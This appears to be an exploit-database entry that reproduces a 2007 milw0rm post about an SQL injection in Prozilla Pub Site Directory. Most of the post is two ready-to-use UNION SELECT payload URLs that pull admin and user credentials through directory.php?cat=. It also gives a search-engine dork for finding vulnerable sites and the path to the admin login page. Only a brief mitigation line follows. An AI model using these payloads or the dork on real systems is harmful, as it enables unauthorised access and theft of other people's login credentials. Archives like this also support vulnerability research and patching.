header-logo
Suggest Exploit
vendor:
Pub Site Directory
by:
t0pP8uZz & xprog
5.5
CVSS
MEDIUM
SQL Injection
89
CWE
Product Name: Pub Site Directory
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Prozilla Pub Site Directory SQL Injection Vulnerability

The vulnerability allows an attacker to extract users and admins login information. The exploit involves using a UNION SELECT statement to retrieve the username and password.

Mitigation:

The vulnerability can be mitigated by implementing proper input validation and parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

--==+================================================================================+==--
--==+		    Prozilla Pub Site Directory SQL Injection Vulnerbility           +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog
SITE: prozilla.com
DORK: inurl:"directory.php?cat=" pubs


DESCRIPTION: 
pull out users and admins login information


EXPLOITS:
http://server.com/Script_Dir/directory.php?cat=-1/**/UNION/**/ALL%20SELECT/**/1,2,3,4,5,6,7,concat(username,0x3a,password),9,10,11,12,13,14/**/FROM/**/admin/*
http://server.com/Script_Dir/directory.php?cat=-1/**/UNION/**/ALL%20SELECT/**/1,2,3,4,5,6,7,concat(username,0x3a,password),9,10,11,12,13,14/**/FROM/**/users/*


NOTE/TIP: 
admin login at /siteadmin/


GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.org !


--==+================================================================================+==--
--==+		    Prozilla Pub Site Directory SQL Injection Vulnerbility           +==--
--==+================================================================================+==--

# milw0rm.com [2007-08-06]